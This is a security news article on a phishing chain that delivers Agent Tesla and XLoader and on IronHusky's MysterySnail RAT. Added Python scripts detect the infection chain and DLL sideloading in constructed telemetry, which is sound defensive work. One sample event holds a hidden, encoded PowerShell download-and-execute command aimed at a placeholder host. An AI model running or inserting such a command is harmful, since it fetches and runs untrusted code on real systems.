A new multi-stage attack has been observed delivering malware families such as Agent Tesla variants, Remcos RAT and XLoader.
“Attackers increasingly rely on such complex delivery mechanisms to evade detection, bypass traditional sandboxes and ensure successful payload delivery and execution,” Palo Alto Networks Unit 42 researcher Saqib Khanzada noted in the company’s technical write-up.
The starting point of the attack is a deceptive email, posing as an order release request, that carries a malicious 7-Zip archive attachment containing a JavaScript Encoded (.jse) file.
The email, observed in December 2024, falsely claimed that a payment had been made and urged the recipient to review an attached order file. Running the JavaScript payload starts the infection sequence: the file acts as a downloader for a PowerShell script hosted on an external server.
The script, in turn, carries a Base64-encoded payload that is decoded, written to the temporary directory and executed. This is where things get interesting: the attack leads to a next-stage dropper that is compiled either with .NET or with AutoIt.
In the .NET case, the embedded encrypted payload (a Snake Keylogger or XLoader sample) is decoded and injected into a running “RegAsm.exe” process, a technique observed in past Agent Tesla campaigns.
The AutoIt executable, on the other hand, adds a further layer in an attempt to complicate analysis. The AutoIt script inside the executable embeds an encrypted payload that loads the final shellcode, which in turn injects a .NET file into a “RegSvcs.exe” process, ultimately leading to the deployment of Agent Tesla.
“This suggests that the attacker uses multiple execution paths to improve persistence and detection evasion,” Khanzada said. “The attacker’s focus remains on a multi-layered attack chain rather than complex obfuscation.”
“By stacking simple stages rather than focusing on highly sophisticated techniques, attackers can build resilient attack chains that complicate analysis and detection.”
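The chain described above (script host running a .jse file, PowerShell with an encoded command, an executable dropped into a user-writable directory, and finally RegAsm.exe or RegSvcs.exe launched outside developer tooling) can be hunted as an ancestry pattern in process-creation telemetry. The following is an added example written for this page, not Unit 42's tooling: the Sysmon-style field names, the PIDs, the paths and the allow-list of expected RegAsm parents are constructed assumptions to be tuned per estate.

```python
"""Hunt for the .JSE -> PowerShell -> dropper -> RegAsm/RegSvcs chain in process-creation events.

Added example for this article; not Unit 42's code. Records mimic Sysmon Event ID 1
(ProcessCreate) fields; field names, PIDs and paths are constructed.
"""
import base64
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# .NET utilities the write-up names as injection targets.
CLR_HOSTS = {"regasm.exe", "regsvcs.exe"}
# Parents under which RegAsm/RegSvcs are expected (assumed allow-list; tune per estate).
EXPECTED_CLR_PARENTS = {"devenv.exe", "msbuild.exe", "msiexec.exe"}
USER_WRITABLE = re.compile(r"\\(?:appdata\\local\\temp|downloads|temp)\\", re.IGNORECASE)
JSE_ARG = re.compile(r"\.jse?\b", re.IGNORECASE)
ENCODED_PS = re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|FromBase64String", re.IGNORECASE)


def _b64_utf16(s: str) -> str:
    """Encode a command the way PowerShell's -EncodedCommand expects (UTF-16LE, then Base64)."""
    return base64.b64encode(s.encode("utf-16le")).decode("ascii")


# Constructed sample telemetry: one suspicious chain (PIDs 100-500) and one benign
# RegAsm launch from Visual Studio (PIDs 600-700).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\u\AppData\Local\Temp\Order_12345.jse"'},
    {"pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -enc "
                + _b64_utf16("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')")},
    {"pid": 400, "ppid": 300, "image": r"C:\Users\u\AppData\Local\Temp\Order_12345.exe",
     "cmdline": "Order_12345.exe"},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmdline": "RegAsm.exe"},
    {"pid": 600, "ppid": 100, "image": r"C:\Program Files\Microsoft Visual Studio\devenv.exe",
     "cmdline": "devenv.exe"},
    {"pid": 700, "ppid": 600, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmdline": "RegAsm.exe /codebase Foo.dll"},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument, or None if absent or undecodable."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def stage_tags(event: dict) -> set:
    """Label one event with the chain stages it matches."""
    name = basename(event["image"])
    tags = set()
    if name in SCRIPT_HOSTS and JSE_ARG.search(event["cmdline"]):
        tags.add("jse_script_host")
    if name == "powershell.exe" and ENCODED_PS.search(event["cmdline"]):
        tags.add("encoded_powershell")
    if USER_WRITABLE.search(event["image"]):
        tags.add("dropper_in_user_dir")
    if name in CLR_HOSTS:
        tags.add("clr_host")
    return tags


def find_chains(events: list, min_stages: int = 3) -> list:
    """Walk up from every RegAsm/RegSvcs launch; report ancestries hitting >= min_stages stages."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for event in events:
        if basename(event["image"]) not in CLR_HOSTS:
            continue
        parent = by_pid.get(event["ppid"])
        if parent and basename(parent["image"]) in EXPECTED_CLR_PARENTS:
            continue  # developer tooling; not the pattern being hunted
        tags, chain, seen, pid = set(), [], set(), event["pid"]
        while pid in by_pid and pid not in seen:  # 'seen' guards against PID-reuse cycles
            seen.add(pid)
            node = by_pid[pid]
            tags |= stage_tags(node)
            chain.append(basename(node["image"]))
            pid = node["ppid"]
        if len(tags) >= min_stages:
            findings.append({"pid": event["pid"], "chain": chain[::-1], "stages": sorted(tags)})
    return findings


if __name__ == "__main__":
    for f in find_chains(SAMPLE_EVENTS):
        print(f["pid"], " -> ".join(f["chain"]), f["stages"])
        print("  decoded:", decode_encoded_command(SAMPLE_EVENTS[2]["cmdline"]))
```

Requiring several stages in one ancestry, rather than alerting on any single RegAsm.exe launch, is what keeps this usable: RegAsm and RegSvcs are legitimately spawned by build and install tooling, which the allow-list skips, while the stacked stages the researchers describe are exactly what a benign chain lacks.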
IronHusky Delivers New Version of MysterySnail RAT
The disclosure comes as Kaspersky detailed a campaign targeting government organizations in Mongolia and Russia with a new version of a malware family called MysterySnail RAT. The activity has been attributed to a Chinese-speaking threat actor tracked as IronHusky.
IronHusky, assessed to have been active since at least 2017, was previously documented by the Russian cybersecurity company in October 2021 in connection with the zero-day exploitation of CVE-2021-40449, a Win32k privilege escalation flaw, to deliver MysterySnail.
The infections originate from a malicious Microsoft Management Console (MMC) script that mimics a Word document from the National Land Agency of Mongolia. The script is designed to fetch a ZIP archive containing a lure document, a legitimate binary (“CiscoCollabHost.exe”) and a malicious DLL (“CiscoSparkLauncher.dll”).
It is not known exactly how the MMC script is distributed to targets of interest, although the nature of the lure document suggests a phishing campaign.
As observed in many attacks, “CiscoCollabHost.exe” is used to sideload the DLL, an intermediary backdoor that communicates with the attackers’ infrastructure through the open-source piping-server project.
The backdoor supports running command shells, downloading and uploading files, listing directory contents, deleting files, creating new processes and terminating itself. These commands are then used to download the MysterySnail RAT.
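The sideloading step above (a legitimate, signed host binary resolving a DLL from its own directory, where the attacker has placed a malicious one) is a shape that can be caught generically in image-load telemetry rather than by file name. The following is an added example written for this page, not Kaspersky's code: the records mimic Sysmon Event ID 7 (ImageLoad) enriched with the host process's signer, which is an assumed enrichment (for instance joined from the process-creation event or an Authenticode lookup), and every path, signer name and event is constructed.

```python
"""Flag DLL sideloading: a signed host binary loading a DLL from its own directory that is
unsigned or signed by a different party.

Added example for this article; not Kaspersky's code. Records mimic Sysmon Event ID 7
(ImageLoad) plus an assumed host-signer enrichment; paths, signers and events are constructed.
"""
import ntpath

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")
VENDOR_DIRS = (r"c:\program files", r"c:\program files (x86)")


def _norm(path: str) -> str:
    return path.replace("/", "\\").lower()


def assess_image_load(ev: dict):
    """Return a finding dict for a sideload-shaped load, else None."""
    host = _norm(ev["image"])
    dll = _norm(ev["image_loaded"])
    host_dir, dll_dir = ntpath.dirname(host), ntpath.dirname(dll)
    # Sideloading resolves the DLL from the application directory, not from the system.
    if dll_dir != host_dir or dll_dir.startswith(SYSTEM_DIRS):
        return None
    if not ev.get("host_signed"):
        return None  # this heuristic targets abuse of trusted hosts; unsigned hosts need other rules
    reasons = []
    if not ev.get("dll_signed"):
        reasons.append("unsigned DLL loaded by signed host")
    elif ev.get("dll_signer") != ev.get("host_signer"):
        reasons.append("DLL signer differs from host signer")
    if not reasons:
        return None
    if not host_dir.startswith(VENDOR_DIRS):
        reasons.append("host runs outside an install directory")
    return {
        "host": ntpath.basename(host),
        "dll": ntpath.basename(dll),
        "severity": "high" if len(reasons) >= 2 else "medium",
        "reasons": reasons,
    }


def scan(events: list) -> list:
    return [f for f in map(assess_image_load, events) if f]


# Constructed sample events (not real telemetry); signer strings are placeholders.
SAMPLE_EVENTS = [
    {   # the pattern from the article: legitimate host, malicious DLL dropped beside it
        "image": r"C:\Users\u\Downloads\lure\CiscoCollabHost.exe",
        "host_signed": True, "host_signer": "Cisco Systems, Inc.",
        "image_loaded": r"C:\Users\u\Downloads\lure\CiscoSparkLauncher.dll",
        "dll_signed": False, "dll_signer": None,
    },
    {   # same host loading a system DLL: normal
        "image": r"C:\Users\u\Downloads\lure\CiscoCollabHost.exe",
        "host_signed": True, "host_signer": "Cisco Systems, Inc.",
        "image_loaded": r"C:\Windows\System32\kernel32.dll",
        "dll_signed": True, "dll_signer": "Microsoft Windows",
    },
    {   # properly installed copy loading its own vendor-signed DLL: normal
        "image": r"C:\Program Files\Cisco Collab\CiscoCollabHost.exe",
        "host_signed": True, "host_signer": "Cisco Systems, Inc.",
        "image_loaded": r"C:\Program Files\Cisco Collab\CiscoSparkLauncher.dll",
        "dll_signed": True, "dll_signer": "Cisco Systems, Inc.",
    },
    {   # installed host, DLL signed by a different party: worth a look
        "image": r"C:\Program Files\Acme\tool.exe",
        "host_signed": True, "host_signer": "Acme Corp",
        "image_loaded": r"C:\Program Files\Acme\helper.dll",
        "dll_signed": True, "dll_signer": "Somebody Else Ltd",
    },
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["severity"], f["host"], "->", f["dll"], ";", "; ".join(f["reasons"]))
```

Keying on the signer relationship between host and DLL, plus where the pair is running from, is what makes the rule survive the attacker renaming the DLL or picking a different host: the article's CiscoCollabHost.exe case lands as a high-severity hit without the rule knowing that file name.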
The latest version of the malware accepts nearly 40 commands, allowing it to perform file management operations, execute commands via cmd.exe, spawn and kill processes, manage services and connect to network resources using dedicated DLL modules.
Kaspersky said it also observed the attackers dropping a “repurposed and more lightweight version” of MysterySnail, codenamed MysteryMonoSnail, after the affected organizations had initiated preventive actions to block the intrusion.
“This version does not have as many capabilities as the MysterySnail RAT version,” the company said. “It was programmed to have only 13 basic commands, used to list directory contents, write data to files, and launch processes and remote shells.”